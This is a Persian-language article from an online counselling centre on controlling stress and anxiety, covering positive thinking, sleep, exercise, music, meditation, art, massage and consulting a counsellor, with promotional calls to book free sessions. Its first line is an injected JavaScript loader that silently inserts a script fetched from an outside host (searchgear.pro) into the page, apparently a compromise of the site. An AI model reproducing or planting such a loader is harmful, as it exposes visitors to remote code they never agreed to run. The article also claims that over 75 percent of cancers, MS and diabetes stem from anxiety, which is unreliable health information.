;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); چگونه استرس خود را درمان کنیم؟|روش‌های موثر کنترل استرس

روش های کنترل استرس و اضطراب

میزان پیشرفت خواندن شما

فهرست مطالب

از جمله مشکلات و معضلات روانشناختی زندگی انسان امروز، استرس و تشویش خاطر می باشد. به همین واسطه، برای کنترل استرس و اضطراب نیز روش های و رویکرد های مختلفی نیز به وجود آمده و ارائه شده اند. زمانی که فشار مشکلات فراتر از آستانه تحمل فرد شود، به وی فشار آورده و روال ذهنی، روحی و جسمی او را دچار تشویش و به هم ریختگی خواهد کرد. بالغ بر 75 درصد از بیماری های جسمی، قلبی، سرطان ها، بیماری مزمن ام اس یا دیابت از عدم تعادل روحی و اضطراب نشات گرفته و گاهی منجر به سکته و مرگ فرد می گردد.

تلاش ما در این مقاله بر این است که افراد را به پذیرش فشارهایی که در زندگی برای آنها پیش می آیند، ترغیب کنیم. تنها در این صورت قادر به مهار ساختن و کنترل استرس و اضطراب خود در این دنیای پر‌تنش و پر از نگرانی امروز، خواهند بود. بدین واسطه تا حد زیادی از بروز مشکلات جسمی و روانی در این افراد کاسته خواهد شد. در مرکز مشاوره آنلاین روان یاری هر فردی که دچار مشکلات روحی، روانی، زناشویی یا اجتماعی شده قادر است از مشاوره آنلاین  این مرکز استفاده نماید.

چگونه استرس خود را کنترل کنیم؟

استرس و اضطراب برای هر فرد و در هر شرایطی پیش خواهد آمد. پس هیچ راه گریزی از آن وجود نخواهد داشت. در عوض بهتر است دنبال یافتن جواب این سوال باشید که، چطور استرس را کنترل کنیم؟ در پی یافتن پاسخ خود، با روش های مقابله و کنترل استرس و اضطراب بیشتر آشنا خواهید شد.

مقابله با اضطراب به اقداماتی مربوط می گردد که در مواجه با عوامل تهدید آمیز و استرس زا از آنها استفاده می شود. انسان موجود بسیار پیچیده ای است. به همین دلیل ممکن است عکس العملی که دو نفر در رویارویی با یک اتفاق یا پیشامد یکسان از خود نشان می دهند، با یکدیگر متفاوت باشد. یک واقعه ممکن است برای یک نفر استرس و ناراحتی به همراه داشته و برای دیگری یک واقعه خوشایند، جدید و هیجان انگیز باشد. وقایع حال روحی ما را تعیین نمی کنند بلکه نوع برداشت و طرز تفکر ما باعث خواهند شد واکنش نشان دهیم.

ما از میان کلیه روش های کنترل استرس و اضطراب، روش هیجان محور را مبنای صحبت قرار می دهیم. در این روش فرد به سوی یک دلبستگی ایمن هدایت شده و قادر است با حذف استرس و احساسات منفی چون غم، ناراحتی، غربت، تنهایی و … از زندگی خود و جایگزین نمودن عوامل مثبت و سازنده، بر نگرانی ها و اضطراب خود چیره شده و کنترل هیجانات و احساسات خود را در دست بگیرد. در واقع فرد مضطرب با تامین نیازهای عاطفی خود به آرامش، حس خوب و تسلی خاطر دست پیدا خواهد کرد.

آشنایی با روش‌های کاربردی برای کنترل استرس

برای کنترل اضطراب و استرس روش های مختلفی وجود دارد. در این بخش از میان کلیه راه حل ها به معرفی مواردی خواهیم پرداخت که به نوعی به فرد در کنترل هیجان و به هم ریختگی و تغییر ذهنیت و عکس العمل آنها در برابر وقایع کمک خواهند کرد. بهترین روش برای کنترل هیجانات و استرس، نظم بخشیدن به افکار و ایجاد تغییرات در سبک زندگی می باشد.

از جمله روش‌های کاربردی برای کنترل اضطراب و استرس می توان به موارد زیر اشاره کرد:

کنترل استرس و اضطراب با تغییر دیدگاه و طرز تفکر

از جمله راهکارهای کنترل استرس و اضطراب، تغییر طرز فکر شما می باشد. سعی کنید به همه مسائل در زندگی به دید خوب نگاه کرده و با آن همچون یک فرصت جدید برخورد کنید. زمانی که در افکار منفی غرق شده و تشویش به سراغ شما آمد، کافی است به آن موضوع از زاویه دیگر نگاه کنید. مثبت اندیش باشید و وقوع هر پیشامدی را به نفع خود بدانید. به عنوان مثال اگر رئیستان به خاطر اشکالی که در نتیجه کار حاصل شده از شما انتقاد کرد، به جای خودخوری و استرس، تلاش کنید مهارت خود را در انجام هر چه بهتر کار خود افزایش داده و عزت نفس خود را بالا ببرید.

  ذهن شلوغ

با یک تلنگر جهت فکر خود را بچرخانید

به خاطر داشته باشید که هر موضوعی ارزش فکر کردن ندارد. بنابراین زمانی که با پیشامدی روبرو شدید که وقوع آن به شما هیچ ارتباطی نداشته، با فکر کردن به آن موضوع خود را درگیر اضطراب و استرس خواهید کرد. در این مواقع، بهترین اقدام آن است که حواس خود را پرت کرده و به موضوع جذاب یا خاطره شیرین دیگری فکر کنید.

افکار منفی به سرعت از یک موضوع کوچک آغاز شده و شاخ و برگ پیدا می کنند. اگر می خواهید در جهت کنترل و درمان استرس خود گام موثری بردارید، در زمان هجوم افکار منفی، با یک تلنگر ساده، رشته افکار خود را پاره کنید. حال قادر هستید فکر خود را به جهتی هدایت کنید که حال خوبی را برای شما به ارمغان آورد.

به اندازه کافی استراحت کنید

کنترل استرس و اضطراب، با آرام کردن کلیه اندام ها و اعضای بدن به سادگی قابل انجام خواهد بود. داشتن خواب با کیفیت و کافی، به بازسازی کلیه سلول های بدن و بسته شدن فایل های ذهنی شما کمک خواهد کرد.

کنترل و درمان استرس با قدم زدن در طبیعت

طبیعت سرشار از حس تازگی و طراوت است. با رفتن به طبیعت احساس آرامش و شادابی به شما منتقل خواهد شد.

تحرک خود را بالاتر برده و ورزش کنید

داشتن تحرک زیاد و انجام حرکات ورزشی یا پیاده روی های منظم، سبب دفع سموم بدن و ایجاد آرامش در عضلاتی خواهد شد که به دلیل استرس دچار اسپاسم و ناراحتی شده اند. ورزش و تحرک حواس شما را از گذشته و آینده به زمان حال معطوف ساخته و در کنترل استرس و اضطراب بسیار موثر خواهد بود. افرادی که به دلیل مسائل روحی و روانی دچار افزایش وزن شده اند، با انجام فعالیت های ورزشی به کاهش وزن خود نیز کمک خواهند کرد.

به یک موسیقی آرام بخش گوش کنید

یکی دیگر از روش های کنترل استرس و اضطراب، گوش کردن به یک موسیقی آرام بخش می باشد. قرار دادن بدن در حالت آرامش و گوش کردن به موسیقی، در تغییر حال روحی شما بسیار موثر خواهد بود. بهترین آهنگ، صدای طبیعت است. گوش دادن به موسیقی بی کلامی که با صدای امواج دریا یا صوت پرندگان ترکیب شده است، آرامش عمیقی به شما منتقل خواهد کرد.

با مشاور یا افراد پر انرژی صحبت و معاشرت کنید

زمانی که دچار استرس یا حال بد هستید، هم کلام شدن با افراد منفی فرکانس شما را پایین تر خواهد آورد. در این بین، صحبت کردن یا مشورت کردن با یک مشاور یا فردی که مثبت اندیش و پر انرژی است، حال درونی شما را دگرگون خواهد ساخت. این افراد دیدگاه شما به مسائل تغییر داده و در یافتن راه حل برای حل مشکلات و کنترل استرس و اضطراب به شما یاری خواهند رساند.

کنترل استرس و اضطراب با انجام کارهای هنری

انجام کارهای هنری از جمله نقاشی، نواختن موسیقی، مجسمه سازی و … ذهن شما را از گذشته و آینده آزاد می سازد. کارهای هنری ذهن و جسم شما را به طور همزمان در زمان حال درگیر کرده و با القای حس خلاقیت در وجود شما، احساس بی نظیری را به وجود خواهد آورد. به همین دلیل انجام فعالیت های خلاقانه و هنری برای کنترل استرس و اضطراب بسیار تاکید می شود. هنرمندان بسیاری اذعان داشته اند که بهترین آثار هنری خود را در دورانی خلق نموده اند که برای فرار از فشارهای روحی و روانی دست به کار خلق آثار هنری خود شده اند.

  گوریل نامرئی

اگر نوشتن شما را آرام تر می کند، بنویسید

پذیرش این نکته که عوامل استرس زا در زندگی هر کسی وجود دارند، مقابله با آن ها را ساده تر می سازد. در اغلب موارد، با نوشتن مشکلات یا مسائل خود، شدت فشاری که بر شما وارد می شود کاسته خواهد شد. بسیاری از افراد به نوشتن علاقه مند بوده و با این کار حال خوبی پیدا می کنند. برای این افراد داستان سرایی یا نوشتن شعر یا نثر، برای کنترل استرس و اضطراب روشی مناسب خواهد بود.

برای شل شدن عضلات خود از ماساژ استفاده کنید

ماساژ درمانی از روش های علمی و حرفه ای برای درمان بیماری های جسمی و روحی و کنترل استرس و اضطراب محسوب می شود. انجام ماساژ ریلکسی یا درمانی توسط افراد کارآزموده و حرفه ای، برای شل شدن عضلات و آرام سازی آنها مفید خواهد بود.

کنترل و درمان استرس با بالا بردن تمرکز و سفر به زمان حال با مدیتیشن

از جمله قویترین تکنیک ها برای آرام سازی کلیه اعضای بدن و کنترل و درمان استرس مدیتیشن می باشد. با استفاده از این تکنیک از ناراحتی ها و اتفاقاتی که در گذشته برای شما پیش آمده و باعث به هم ریختن احساساتتان شده رها می شوید. همچنین، ذهن خود را از وقایع و نگرانی هایی که در آینده پیش می آیند نیز خالی خواهید کرد. بودن در زمان حال علاوه بر آرامش، شادابی و انگیزه را نیز در شما بیدار خواهد ساخت.

شاید برای رهایی از استرس لازم باشد مکان فعلی یا افراد اطراف خود را ترک کنید

برای برخی از افراد محیط کار استرس زا می باشد. کنترل استرس و اضطراب در محیط کاری پر تنش، کار چندان ساده ای نخواهد بود. شاید شما به کاری مشغول باشید که به آن علاقه ای نداشته و تمام روز در استرس و تشویش به کار مشغول هستید. پیشنهاد ما به شما این است که شغل خود را فدای سلامتی خود کنید. افراد، بیشترین زمان روز خود را به کار و حرفه خود مشغول هستند. بودن در فضایی نفرت انگیز و استرس زا چیزی جز بیماری و حال بد برای شما به همراه نخواهد داشت. پس با تغییر موقعیت کاری خود یا حذف دوستانی که شما را رنج می دهند یا افرادی که باعث القای حس منفی در شما می شوند، قدمی برای تسکین و بهبود حال روحی خود برداشته اید.

کنترل اضطراب و استرس با تکیه بر مشاوران با سابقه

در کنار کلیه روش هایی که برای کنترل استرس و اضطراب برشمرده شد، فرد می تواند مشکل خود با یک مشاور خبره و با تجربه نیز در میان بگذارد. مشاور با شنیدن صحبت های فرد مراجعه کننده، آگاهی از شرایط کاری و زندگی او و مطلع شدن از مشکلات و مسائلی که فرد در گذشته با آنها درگیر بوده است، بهترین راهکار را به او ارائه خواهد داد. بدین ترتیب، فرد برای کنترل و درمان استرس، حل مشکل یا پذیرش آن و حذف عواملی که تشویش و نگرانی را برای وی به همراه دارند، قادر خواهد بود بهترین اقدام را انجام دهد. مرکز مشاوره آنلاین روان یاری با تکیه بر مشاوران با سابقه و خبره و با ارائه مشاوره فردی به صورت آنلاین، همراه و همیار همیشگی شما خواهد بود.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.